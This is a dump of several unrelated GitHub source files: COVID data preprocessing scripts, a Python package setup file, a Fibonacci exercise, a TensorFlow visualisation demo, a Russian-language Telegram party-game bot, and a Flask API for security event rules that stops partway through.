Hospitalizations.csv'\n\ndate_error = None\nrecord_date = None\nwith open(ecdc_file) as f:\n for i,line in enumerate(f):\n if i > 0:\n fields = line.split(',')\n df = fields[2].split('-')\n record_date = datetime.date(int(df[0]),int(df[1]),int(df[2]))\n state = fields[1]\n value = int(fields[3])\n\n if record_date.weekday() != 5:\n if date_error is not None:\n date_error = state + ' : ' + record_date.isoformat()\n\n if state not in raw_states:\n\n if state not in data_by_state:\n data_by_state[state] = {}\n data_by_state[state][t0] = 0\n last_date_by_state[state] = t0\n if record_date <= t0:\n data_by_state[state][t0] += value\n else:\n daily = int(value/7)\n extra = value%7\n for iday in range(7):\n date = record_date - timedelta(days=iday)\n data_by_state[state][date] = daily\n if iday < extra:\n data_by_state[state][date] += 1\n if record_date > last_date_by_state[state]:\n last_date_by_state[state] = record_date\n\nif date_error is not None:\n print(' *** Error in weekly data:',date_error)\n\nprint('Weekly Hospitalization data provided up to (last date):')\nlast_date = t0\nfor state in data_by_state:\n if last_date_by_state[state]>last_date:\n last_date = last_date_by_state[state]\n if state not in raw_states:\n print(state, last_date_by_state[state])\n\nwith open('eu-ecdc-pypm.csv', 'w') as the_file:\n\n data_started = {}\n previous_value = {}\n hbuff = ['date']\n for country in regional_abbreviations:\n state = regional_abbreviations[country]\n hbuff.append(state + '-hd')\n the_file.write(','.join(hbuff) + '\\n')\n\n the_date = datetime.date(2020,3,1)\n while the_date <= last_date:\n buff = [the_date.isoformat()]\n for country in regional_abbreviations:\n state = regional_abbreviations[country]\n value = ''\n if state in data_by_state:\n if the_date in data_by_state[state]:\n if state not in data_started:\n data_started[state] = True\n value = str(data_by_state[state][the_date])\n previous_value[state] = value\n elif data_started[state]:\n value = previous_value[state]\n buff.append(value)\n\n the_file.write(','.join(buff) + '\\n')\n the_date += timedelta(days=1)\n","repo_name":"pypm/data","sub_path":"covid19/EU/make_ecdc_csv.py","file_name":"make_ecdc_csv.py","file_ext":"py","file_size_in_byte":8780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19197963421","text":"from setuptools import setup, find_packages\n\nrequirements = [\n 'percy',\n 'robotframework',\n 'robotframework-selenium2library',\n]\n\nsetup(\n name='robot-framework-percy',\n version='0.1',\n description='Robot framework Percy client',\n url='https://github.com/Minh0001/robot-framework-percy',\n author='Minh Le',\n author_email='quangminh0001@gmail.com',\n license='MIT',\n package_dir={'': 'src'},\n packages=find_packages('src'),\n zip_safe=False,\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n ],\n)\n","repo_name":"Minh0001/robot-framework-percy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16660604780","text":"\"\"\"\nCOMP.CS.100: Fibonacci\nTekijä: Erkka Lehtoranta\nOpiskelijanumero: *SECRET*\nDescription: A program printing the Fibonacci sequence to a user specified end.\n\"\"\"\n\n\ndef main():\n end: int = int(input('How many Fibonacci numbers do you want? '))\n first = 0\n second = fib = 1\n\n i = 1\n while i <= end:\n print(f'{i}. {fib}')\n fib = first + second\n first = second\n second = fib\n i += 1\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"elehtoranta/CS100","sub_path":"2_loops/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29748904690","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport sys\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nfrom beholder.beholder import Beholder\n\nFLAGS = None\n\nLOG_DIRECTORY = '/tmp/beholder-demo'\n\ndef train():\n mnist = input_data.read_data_sets(FLAGS.data_dir,\n one_hot=True,\n fake_data=FLAGS.fake_data)\n\n sess = tf.InteractiveSession()\n\n with tf.name_scope('input'):\n x = tf.placeholder(tf.float32, [None, 784], name='x-input')\n y_ = tf.placeholder(tf.float32, [None, 10], name='y-input')\n\n with tf.name_scope('input_reshape'):\n image_shaped_input = tf.reshape(x, [-1, 28, 28, 1])\n tf.summary.image('input', image_shaped_input, 10)\n\n def weight_variable(shape):\n \"\"\"Create a weight variable with appropriate initialization.\"\"\"\n initial = tf.truncated_normal(shape, stddev=0.01)\n return tf.Variable(initial)\n\n def bias_variable(shape):\n \"\"\"Create a bias variable with appropriate initialization.\"\"\"\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n def variable_summaries(var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\n def nn_layer(input_tensor, input_dim, output_dim, layer_name, act=tf.nn.relu):\n \"\"\"Reusable code for making a simple neural net layer.\n\n It does a matrix multiply, bias add, and then uses ReLU to nonlinearize.\n It also sets up name scoping so that the resultant graph is easy to read,\n and adds a number of summary ops.\n \"\"\"\n # Adding a name scope ensures logical grouping of the layers in the graph.\n with tf.name_scope(layer_name):\n # This Variable will hold the state of the weights for the layer\n with tf.name_scope('weights'):\n weights = weight_variable([input_dim, output_dim])\n variable_summaries(weights)\n with tf.name_scope('biases'):\n biases = bias_variable([output_dim])\n variable_summaries(biases)\n with tf.name_scope('Wx_plus_b'):\n preactivate = tf.matmul(input_tensor, weights) + biases\n tf.summary.histogram('pre_activations', preactivate)\n activations = act(preactivate, name='activation')\n tf.summary.histogram('activations', activations)\n return activations\n\n #conv1\n kernel = tf.Variable(tf.truncated_normal([5, 5, 1, 10], dtype=tf.float32,\n stddev=1e-1), name='conv-weights')\n conv = tf.nn.conv2d(image_shaped_input, kernel, [1, 1, 1, 1], padding='VALID')\n biases = tf.Variable(tf.constant(0.0, shape=[kernel.get_shape().as_list()[-1]], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv1 = tf.nn.relu(out, name='relu')\n\n #conv2\n kernel2 = tf.Variable(tf.truncated_normal([3, 3, 10, 20], dtype=tf.float32,\n stddev=1e-1), name='conv-weights2')\n conv2 = tf.nn.conv2d(conv1, kernel2, [1, 1, 1, 1], padding='VALID')\n biases2 = tf.Variable(tf.constant(0.0, shape=[kernel2.get_shape().as_list()[-1]], dtype=tf.float32),\n trainable=True, name='biases')\n out2 = tf.nn.bias_add(conv2, biases2)\n conv2 = tf.nn.relu(out2, name='relu')\n\n flattened = tf.contrib.layers.flatten(conv2)\n\n\n # hidden1 = nn_layer(x, x.get_shape().as_list()[1], 10, 'layer1')\n hidden1 = nn_layer(flattened, flattened.get_shape().as_list()[1], 10, 'layer1')\n\n with tf.name_scope('dropout'):\n keep_prob = tf.placeholder(tf.float32)\n tf.summary.scalar('dropout_keep_probability', keep_prob)\n dropped = tf.nn.dropout(hidden1, keep_prob)\n\n y = nn_layer(dropped, 10, 10, 'layer2', act=tf.identity)\n\n with tf.name_scope('cross_entropy'):\n diff = tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y)\n with tf.name_scope('total'):\n cross_entropy = tf.reduce_mean(diff)\n tf.summary.scalar('cross_entropy', cross_entropy)\n\n with tf.name_scope('train'):\n optimizer = tf.train.AdamOptimizer(FLAGS.learning_rate)\n gradients, train_step = Beholder.gradient_helper(optimizer, cross_entropy)\n\n with tf.name_scope('accuracy'):\n with tf.name_scope('correct_prediction'):\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n with tf.name_scope('accuracy'):\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('accuracy', accuracy)\n\n merged = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(LOG_DIRECTORY + '/train', sess.graph)\n test_writer = tf.summary.FileWriter(LOG_DIRECTORY + '/test')\n tf.global_variables_initializer().run()\n\n visualizer = Beholder(session=sess,\n logdir=LOG_DIRECTORY)\n\n\n def feed_dict(train):\n if train or FLAGS.fake_data:\n xs, ys = mnist.train.next_batch(100, fake_data=FLAGS.fake_data)\n k = FLAGS.dropout\n else:\n xs, ys = mnist.test.images, mnist.test.labels\n k = 1.0\n return {x: xs, y_: ys, keep_prob: k}\n\n for i in range(FLAGS.max_steps):\n # if i % 10 == 0: # Record summaries and test-set accuracy\n summary, acc = sess.run([merged, accuracy], feed_dict=feed_dict(False))\n test_writer.add_summary(summary, i)\n print('Accuracy at step %s: %s' % (i, acc))\n # else: # Record train set summaries, and train\n # if i % 100 == 99: # Record execution stats\n # run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n # run_metadata = tf.RunMetadata()\n # summary, _ = sess.run([merged, train_step],\n # feed_dict=feed_dict(True),\n # options=run_options,\n # run_metadata=run_metadata)\n # train_writer.add_run_metadata(run_metadata, 'step%03d' % i)\n # train_writer.add_summary(summary, i)\n # print('Adding run metadata for', i)\n # else: # Record a summary\n print('i', i)\n feed_dictionary = feed_dict(True)\n summary, gradient_arrays, activations, _ = sess.run([merged, gradients, [image_shaped_input, conv1, conv2, hidden1, y], train_step], feed_dict=feed_dictionary)\n first_of_batch = sess.run(x, feed_dict=feed_dictionary)[0].reshape(28, 28)\n\n visualizer.update(\n arrays=activations + [first_of_batch] + gradient_arrays,\n frame=first_of_batch,\n )\n train_writer.add_summary(summary, i)\n\n train_writer.close()\n test_writer.close()\n\ndef main(_):\n if not tf.gfile.Exists(LOG_DIRECTORY):\n tf.gfile.MakeDirs(LOG_DIRECTORY)\n train()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--fake_data', nargs='?', const=True, type=bool,\n default=False,\n help='If true, uses fake data for unit testing.')\n parser.add_argument('--max_steps', type=int, default=1000000,\n help='Number of steps to run trainer.')\n parser.add_argument('--learning_rate', type=float, default=0.001,\n help='Initial learning rate')\n parser.add_argument('--dropout', type=float, default=0.9,\n help='Keep probability for training dropout.')\n parser.add_argument(\n '--data_dir',\n type=str,\n default='/tmp/tensorflow/mnist/input_data',\n help='Directory for storing input data')\n parser.add_argument(\n '--log_dir',\n type=str,\n default='/tmp/tensorflow/mnist/logs/mnist_with_summaries',\n help='Summaries log directory')\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","repo_name":"chrisranderson/beholder","sub_path":"beholder/demos/demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":8105,"program_lang":"python","lang":"en","doc_type":"code","stars":464,"dataset":"github-code","pt":"40"} +{"seq_id":"25749409916","text":"import telebot\nfrom telebot import types\n\nimport env\nimport users\nimport tasks\n\nbot = telebot.TeleBot(env.token)\nuser = None\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n global user\n user_id = str(message.from_user.id)\n user = users.get_user(user_id)\n if user.id != '0':\n bot.send_message(user_id, 'Привет, '+user.get_name())\n show_main_menu(user_id)\n else:\n user.id = user_id\n sent = bot.send_message(user_id, 'Давай знакомиться! Как тебя зовут?')\n bot.register_next_step_handler(sent, lambda m: acquaint(m, user_id))\n\n\ndef show_main_menu(user_id):\n markup = generate_main_menu_markup()\n bot.send_message(user_id, text='Начнем игру?', reply_markup=markup)\n\n\ndef generate_main_menu_markup():\n list_items = ['Начать игру', 'Настройки']\n markup = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)\n for item in list_items:\n markup.add(item)\n return markup\n\n\ndef acquaint(message, user_id):\n global user\n user_name = message.text\n user.name = user_name\n sex_keyboard = types.InlineKeyboardMarkup()\n key_male = types.InlineKeyboardButton(text='Мужской', callback_data='set_sex_male')\n sex_keyboard.add(key_male)\n key_female = types.InlineKeyboardButton(text='Женский', callback_data='set_sex_female')\n sex_keyboard.add(key_female)\n bot.send_message(user_id, text='Привет, '+user_name+'!\\nТвой пол', reply_markup=sex_keyboard)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_worker(call):\n global user\n user_id = str(call.from_user.id)\n if call.data == \"set_sex_male\":\n user.sex = 'male'\n sent = bot.send_message(user_id, 'Отлично! Как зовут твоего партнера?')\n bot.register_next_step_handler(sent, lambda m: set_partner_name(m, user_id))\n elif call.data == \"set_sex_female\":\n user.sex = 'female'\n sent = bot.send_message(user_id, 'Отлично! Как зовут твоего партнера?')\n bot.register_next_step_handler(sent, lambda m: set_partner_name(m, user_id))\n\n\ndef set_partner_name(message, user_id):\n global user\n user.partner_name = message.text\n user.save()\n show_main_menu(user_id)\n\n\n@bot.message_handler(content_types=['text'])\ndef get_text_messages(message):\n if message.text == \"Начать игру\":\n start_game(str(message.from_user.id))\n elif message.text == \"Настройки\":\n show_settings(str(message.from_user.id))\n elif message.text == \"Зеленый уровень\":\n user.level = 'green'\n user.update(str(message.from_user.id))\n start_tasks(str(message.from_user.id))\n elif message.text == \"Желтый уровень\":\n user.level = 'yellow'\n user.update(str(message.from_user.id))\n start_tasks(str(message.from_user.id))\n elif message.text == \"Красный уровень\":\n user.level = 'red'\n user.update(str(message.from_user.id))\n start_tasks(str(message.from_user.id))\n elif message.text == \"Главное меню\":\n show_main_menu(str(message.from_user.id))\n else:\n bot.send_message(message.from_user.id, \"Я тебя не понимаю. Напиши /help.\")\n\n\ndef start_game(user_id):\n global user\n if user.level is None:\n show_levels(user_id)\n else:\n start_tasks(user_id)\n\n\ndef show_levels(user_id):\n markup = generate_levels_markup()\n bot.send_message(user_id, text='Выбери уровень игры', reply_markup=markup)\n\n\ndef generate_levels_markup():\n list_items = ['Зеленый уровень', 'Желтый уровень', 'Красный уровень', 'Главное меню']\n markup = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)\n for item in list_items:\n markup.add(item)\n return markup\n\n\ndef show_settings(user_id):\n markup = generate_settings_markup()\n bot.send_message(user_id, text='Настройки', reply_markup=markup)\n\n\ndef generate_settings_markup():\n list_items = ['Зеленый уровень', 'Желтый уровень', 'Красный уровень', 'Главное меню']\n markup = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)\n for item in list_items:\n markup.add(item)\n return markup\n\n\ndef start_tasks(user_id):\n task_list = tasks.get_tasks()\n markup = next_task_markup()\n bot.send_message(user_id, text=tasks[0].description, reply_markup=markup)\n\n\ndef next_task_markup():\n list_items = ['Следующее задание', 'Следующий уровень', 'Главное меню']\n markup = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)\n for item in list_items:\n markup.add(item)\n return markup\n\n\nbot.polling(none_stop=True, interval=0)\n\n","repo_name":"g00dvveen/fants","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23254553274","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 22 09:44:10 2021\n\n@author: RP\n\"\"\"\n\n\nfrom urllib.request import urlretrieve\nimport os\nimport pandas as pd\n\n# Link to data that can be retrieved without a file path and/or clicks\n# e.g. URL, database, etc.\nURL = 'https://data.seattle.gov/api/views/65db-xm6k/rows.csv?accessType=DOWNLOAD'\n\n# This function downloads the data and puts it in the repo if it doesn't already exist\ndef get_fremont_data(filename='fremont-bridge.csv',url=URL,force_download=False):\n\n \"\"\"Download and cache the fremont data set\n \n Parameters\n ----------\n filename : string (optional)\n location to save the data\n url : string (optional)\n web location of the data\n force_download : bool (optional)\n if true, force re-download of data\n\n Returns\n -------\n data : pandas.DataFrame\n The fremont bridge data\n \"\"\"\n\n if force_download or not os.path.exists(filename):\n urlretrieve(URL,filename)\n \n # Read the data into a dataframe \n data = pd.read_csv('fremont-bridge.csv',index_col='Date')\n \n date_format = '%m/%d/%Y %I:%M:%S %p'\n \n try:\n data.index = pd.to_datetime(data.index,format=date_format)\n except:\n data.index = pd.to_datetime(data.index)\n\n \n # The columns are bit long so we can make them shorter\n data.columns = ['Total','East Sidewalk','West Sidewalk']\n \n return data","repo_name":"robertpullin/cycling-data-analysis","sub_path":"jupyterworkflow/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8281695857","text":"import time\nimport math\nimport json\nfrom app.api_v2.model.system import Settings\nimport ndjson\nimport datetime\nimport threading\nfrom queue import Queue\nfrom flask import Response, current_app\nfrom flask_restx import Resource, Namespace, fields, marshal\nfrom werkzeug.datastructures import FileStorage\nfrom werkzeug.utils import secure_filename\nfrom ..rql.parser import QueryParser\nfrom ..model import EventRule, Event, Task, CloseReason\nfrom ..model.exceptions import EventRuleFailure\nfrom ..utils import random_ending, token_required, user_has, check_org, log_event, default_org\nfrom .shared import ISO8601, FormatTags, mod_pagination, mod_observable_list, mod_observable_brief, AsDict\nfrom .event import mod_event_status\nfrom ... import ep\n\n\napi = Namespace('EventRule', description='Event Rules control what happens to an event on ingest', path='/event_rule')\n\nmod_event_rule_test = api.model('TestEventRuleQuery', {\n 'query': fields.String(required=True),\n 'organization': fields.String(required=True),\n 'uuid': fields.String,\n 'event_count': fields.Integer(required=True),\n 'return_results': fields.Boolean,\n 'start_date': fields.String,\n 'end_date': fields.String,\n})\n\nmod_event_rule_create = api.model('CreateEventRule', {\n 'name': fields.String,\n 'organization': fields.String,\n 'description': fields.String,\n 'event_signature': fields.String,\n 'merge_into_case': fields.Boolean,\n 'target_case_uuid': fields.String,\n 'add_tags': fields.Boolean,\n 'tags_to_add': fields.List(fields.String),\n 'update_severity': fields.Boolean,\n 'target_severity': fields.Integer,\n 'mute_event': fields.Boolean,\n 'mute_period': fields.Integer,\n 'query': fields.String,\n 'dismiss': fields.Boolean,\n 'dismiss_reason': fields.String,\n 'dismiss_comment': fields.String,\n 'expire': fields.Boolean,\n 'expire_days': fields.Integer,\n 'active': fields.Boolean,\n 'global_rule': fields.Boolean,\n 'run_retroactively': fields.Boolean(optional=True),\n 'skip_previous_match': fields.Boolean(optional=True)\n})\n\nmod_event_rule_list = api.model('EventRuleList', {\n 'uuid': fields.String,\n 'organization': fields.String,\n 'name': fields.String,\n 'description': fields.String,\n 'event_signature': fields.String,\n 'dismiss_comment': fields.String,\n 'dismiss_reason': fields.String,\n 'rule_signature': fields.String,\n 'merge_into_case': fields.Boolean,\n 'target_case_uuid': fields.String,\n 'add_tags': fields.Boolean,\n 'tags_to_add': FormatTags(attribute='tags_to_add'),\n 'update_severity': fields.Boolean,\n 'target_severity': fields.Integer,\n 'mute_event': fields.Boolean,\n 'mute_period': fields.Integer,\n 'dismiss': fields.Boolean,\n 'expire': fields.Boolean,\n 'expire_days': fields.Integer,\n 'active': fields.Boolean,\n 'query': fields.String,\n 'hits': fields.Integer,\n 'hits_last_24': fields.Integer,\n 'observables': fields.List(fields.Nested(mod_observable_brief)),\n 'expire_at': ISO8601(attribute='expire_at'),\n 'created_at': ISO8601(attribute='created_at'),\n 'updated_at': ISO8601(attribute='updated_at'),\n 'last_matched_date': ISO8601(attribute='last_matched_date'),\n 'global_rule': fields.Boolean,\n 'disable_reason': fields.String\n})\n\nmod_event_rule_list_paged = api.model('PagedEventRuleList', {\n 'event_rules': fields.List(fields.Nested(mod_event_rule_list)),\n 'pagination': fields.Nested(mod_pagination)\n})\n\nmod_event_rql = api.model('EventDetailsRQLFormatted', {\n 'uuid': fields.String,\n 'title': fields.String(required=True),\n 'reference': fields.String(required=True),\n 'description': fields.String(required=True),\n 'tlp': fields.Integer,\n 'severity': fields.Integer,\n 'source': fields.String,\n 'status': fields.Nested(mod_event_status),\n 'tags': fields.List(fields.String),\n 'observables': fields.List(fields.Nested(mod_observable_list)),\n 'case': fields.String,\n 'created_at': ISO8601(attribute='created_at'),\n 'modified_at': ISO8601(attribute='updated_at'),\n 'raw_log': AsDict,\n 'signature': fields.String\n})\n\nmod_event_rule_name_only = api.model('EventRuleNames', {\n 'uuid': fields.String,\n 'name': fields.String\n})\n\nevent_rule_list_parser = api.parser()\nevent_rule_list_parser.add_argument('page', type=int, location='args', default=1, required=False)\nevent_rule_list_parser.add_argument('sort_by', type=str, location='args', default='created_at', required=False)\nevent_rule_list_parser.add_argument('sort_direction', type=str, location='args', default='asc', required=False)\nevent_rule_list_parser.add_argument('page_size', type=int, location='args', default=25, required=False)\nevent_rule_list_parser.add_argument('page_size', location='args', required=False, type=int, default=25)\nevent_rule_list_parser.add_argument('page', location='args', required=False, type=int, default=1)\nevent_rule_list_parser.add_argument('rules', location='args', required=False, type=str, action='split')\n\n@api.route(\"\")\nclass EventRuleList(Resource):\n\n @api.doc(security=\"Bearer\")\n @api.marshal_with(mod_event_rule_list_paged)\n @api.expect(event_rule_list_parser)\n @token_required\n @user_has('view_event_rules')\n def get(self, current_user):\n ''' Gets a list of all the event rules '''\n\n args = event_rule_list_parser.parse_args()\n\n event_rules = EventRule.search()\n event_rules = event_rules.filter('term', deleted=False)\n\n if args.rules:\n event_rules = event_rules.filter('terms', uuid=list(set(args.rules)))\n \n event_rules = list(event_rules.scan())\n\n response = {\n 'event_rules': event_rules,\n 'pagination': {\n 'total_results': len(event_rules),\n 'pages': 1,\n 'page': 1,\n 'page_size': args.page_size\n }\n }\n\n return response\n\n @api.doc(security=\"Bearer\")\n @api.expect(mod_event_rule_create)\n @api.marshal_with(mod_event_rule_list)\n @api.response('200', 'Successfully created event rule.')\n @token_required\n @user_has('create_event_rule')\n @check_org\n def post(self, current_user):\n ''' Creates a new event_rule '''\n\n if 'organization' in api.payload:\n settings = Settings.load(organization=api.payload['organization'])\n else:\n settings = Settings.load()\n \n if 'organization' in api.payload:\n event_rule = EventRule.get_by_name(name=api.payload['name'], organization=api.payload['organization'])\n else:\n event_rule = EventRule.get_by_name(name=api.payload['name'])\n\n # Only the default tenant can create global rules\n if 'global_rule' in api.payload and not hasattr(current_user,'default_org'):\n api.payload['global_rule'] = False\n\n if 'global_rule' not in api.payload:\n api.payload['global_rule'] = False\n\n if 'dismiss' in api.payload and api.payload['dismiss']:\n\n if 'dismiss_reason' not in api.payload or api.payload['dismiss_reason'] in [None,'']:\n api.abort(400, 'A dismiss reason is required') \n\n if settings.require_event_dismiss_comment and 'dismiss_comment' not in api.payload:\n api.abort(400, 'Dismiss comment required')\n\n cr = CloseReason.get_by_uuid(uuid=api.payload['dismiss_reason'])\n if not cr:\n api.abort(404, 'Dismiss reason not found')\n\n if 'expire_days' in api.payload and not isinstance(api.payload['expire_days'], int):\n api.abort(400, 'expire_days should be an integer.')\n\n # Compute when the rule should expire\n if 'expire' in api.payload and api.payload['expire']:\n if 'expire_days' in api.payload:\n expire_days = api.payload['expire_days']\n\n expire_at = datetime.datetime.utcnow() + datetime.timedelta(days=expire_days)\n api.payload['expire_at'] = expire_at\n else:\n api.abort(400, 'Missing expire_days field.')\n\n if not event_rule:\n\n event_rule = EventRule(**api.payload)\n event_rule.active = True\n\n # Try to parse the rule and if it fails don't activate it\n try:\n event_rule.parse_rule()\n event_rule.parsed_rule = None\n except Exception as e:\n event_rule.active = False\n api.abort(400, f'Invalid RQL Query. {e}')\n #event_rule.disable_reason = f\"Invalid RQL query. {e}\"\n\n # Set the default state for new Event Rules to not deleted\n event_rule.deleted = False\n event_rule.save(refresh=True)\n time.sleep(1)\n ep.restart_workers()\n\n if 'run_retroactively' in api.payload and api.payload['run_retroactively']:\n \n task = Task()\n request_id = task.create(task_type='event_rule_lookbehind', message=f'Event Rule lookbehind for {event_rule.name} complete.', broadcast=True)\n\n def delayed_retro_push(task, skip_previous, event_rule, api_payload, events):\n '''\n Queries for events and pushes them to the event queue for retro processing\n '''\n\n time.sleep(10)\n\n try:\n is_global = api_payload['global_rule'] if 'global_rule' in api_payload and api_payload['global_rule'] == True else False\n org_specified = api_payload['organization'] if 'organization' in api_payload and api_payload['organization'] != None else None\n\n if not is_global and org_specified:\n events = events.filter('term', organization=api_payload['organization'])\n elif not is_global:\n events = events.filter('term', organization=current_user.organization)\n \n events = events.filter('term', status__name__keyword='New')\n\n task.message += f\" {events.count()} events processed.\"\n task.save()\n\n events = list(events.scan())\n \n if events:\n time.sleep(2)\n for event in events:\n\n # Skip over this event if skip_previous_match is toggled and the\n # event matches the critera\n if skip_previous:\n if event_rule.uuid in event.event_rules:\n continue\n \n event_dict = event.to_dict()\n\n if 'event_observables' in event_dict:\n event_dict['observables'] = event_dict['event_observables']\n \n event_dict['_meta'] = {\n 'action': 'retro_apply_event_rule',\n '_id': event.meta.id,\n 'rule_id': str(event_rule.uuid)\n }\n ep.enqueue(event_dict)\n\n ep.enqueue({'organization': current_user.organization, '_meta':{'action': 'task_end', 'task_id': str(task.uuid)}})\n except Exception as e:\n print(e)\n \n skip_previous = False\n if 'skip_previous_match' in api.payload and api.payload['skip_previous_match']:\n skip_previous = True\n\n events = Event.search()\n\n t = threading.Thread(target=delayed_retro_push, daemon=True, args=(task, skip_previous, event_rule, api.payload, events))\n t.start()\n\n return event_rule\n else:\n api.abort(400, 'Event Rule with this title already exists.')\n\n\n@api.route(\"/\")\nclass EventRuleDetails(Resource):\n\n @api.doc(security=\"Bearer\")\n @api.marshal_with(mod_event_rule_list)\n @token_required\n @user_has('view_event_rules')\n def get(self, uuid, current_user):\n ''' Gets a event rule '''\n event_rule = EventRule.get_by_uuid(uuid=uuid)\n if event_rule:\n return event_rule\n else:\n api.abort(404, 'Event rule not found.')\n\n @api.doc(security=\"Bearer\")\n @api.expect(mod_event_rule_create)\n @api.marshal_with(mod_event_rule_list)\n @token_required\n @user_has('update_event_rule')\n def put(self, uuid, current_user):\n ''' Updates the event rule '''\n event_rule = EventRule.get_by_uuid(uuid=uuid)\n\n if event_rule:\n\n if 'expire_days' in api.payload and not isinstance(api.payload['expire_days'], int):\n api.abort(400, 'expire_days should be an integer.')\n\n # Only the default tenant can create global rules\n if 'global_rule' in api.payload and not hasattr(current_user,'default_org'):\n api.payload['global_rule'] = False\n\n # Computer when the rule should expire\n if 'expire' in api.payload and api.payload['expire']:\n if 'expire_days' in api.payload:\n expire_days = api.payload['expire_days']\n\n expire_at = datetime.datetime.utcnow() + datetime.timedelta(days=expire_days)\n api.payload['expire_at'] = expire_at\n else:\n api.abort(400, 'Missing expire_days field.')\n\n if 'query' in api.payload and api.payload['query'] != event_rule.query:\n if hasattr(event_rule, 'version') and event_rule.version:\n api.payload['version'] = event_rule.version + 1\n else:\n api.payload['version'] = 2\n\n if len(api.payload) > 0:\n event_rule.update(**{**api.payload, 'disable_reason': None}, refresh=True)\n time.sleep(1)\n ep.restart_workers()\n\n if 'run_retroactively' in api.payload and api.payload['run_retroactively']:\n\n task = Task()\n request_id = task.create(task_type='event_rule_lookbehind', message=f'Event Rule lookbehind for {event_rule.name} complete.', broadcast=True)\n\n events = Event.search()\n \n def delayed_retro_push(task, skip_previous, api_payload, events):\n '''\n Queries for events and pushes them to the event queue for retro processing\n '''\n\n time.sleep(10)\n\n try:\n is_global = api_payload['global_rule'] if 'global_rule' in api_payload and api_payload['global_rule'] == True else False\n org_specified = api_payload['organization'] if 'organization' in api_payload and api_payload['organization'] != None else None\n\n if not is_global and org_specified:\n events = events.filter('term', organization=api_payload['organization'])\n elif not is_global:\n events = events.filter('term', organization=current_user.organization)\n \n events = events.filter('term', status__name__keyword='New')\n\n task.message += f\" {events.count()} events processed.\"\n task.save()\n\n events = list(events.scan())\n \n if events:\n time.sleep(2)\n for event in events:\n\n # Skip over this event if skip_previous_match is toggled and the\n # event matches the critera\n if skip_previous:\n if event_rule.uuid in event.event_rules:\n continue\n \n event_dict = event.to_dict()\n if 'event_observables' in event_dict:\n event_dict['observables'] = event_dict['event_observables']\n event_dict['_meta'] = {\n 'action': 'retro_apply_event_rule',\n '_id': event.meta.id,\n 'rule_id': event_rule.uuid\n }\n ep.enqueue(event_dict)\n\n ep.enqueue({'organization': current_user.organization, '_meta':{'action': 'task_end', 'task_id': str(task.uuid)}})\n except Exception as e:\n print(e)\n \n skip_previous = False\n if 'skip_previous_match' in api.payload and api.payload['skip_previous_match']:\n skip_previous = True\n\n with current_app.app_context():\n t = threading.Thread(target=delayed_retro_push, daemon=True, args=(task, skip_previous, api.payload, events))\n t.start()\n \n return event_rule\n else:\n api.abort(404, 'Event rule not found.')\n\n @api.doc(security=\"Bearer\")\n @token_required\n @user_has('delete_event_rule')\n def delete(self, uuid, current_user):\n ''' Removes an event rule '''\n event_rule = EventRule.get_by_uuid(uuid=uuid)\n if event_rule:\n event_rule.name = event_rule.name+random_ending('DELETED')\n event_rule.active = False\n event_rule.deleted = True\n event_rule.save(refresh=True)\n time.sleep(1)\n return {'message': 'Sucessfully deleted the event rule.'}\n\n\nevent_rule_stats_parser = api.parser()\nevent_rule_stats_parser.add_argument('rules', type=str, location='args', action='split', required=False)\nevent_rule_stats_parser.add_argument('metrics', type=str, location='args', action='split', required=False, default=['hits'])\nevent_rule_stats_parser.add_argument('start', location='args', type=str, required=False)\nevent_rule_stats_parser.add_argument('end', location='args', type=str, required=False)\n@api.route(\"/stats\")\nclass EventRuleStats(Resource):\n\n @api.doc(security=\"Bearer\")\n @api.expect(event_rule_stats_parser)\n @token_required\n @user_has('view_event_rules') \n def get(self, current_user):\n args = event_rule_stats_parser.parse_args()\n\n metrics = {}\n\n # Set default start/end date filters if they are not set above\n # We do this here because default= on add_argument() is only calculated 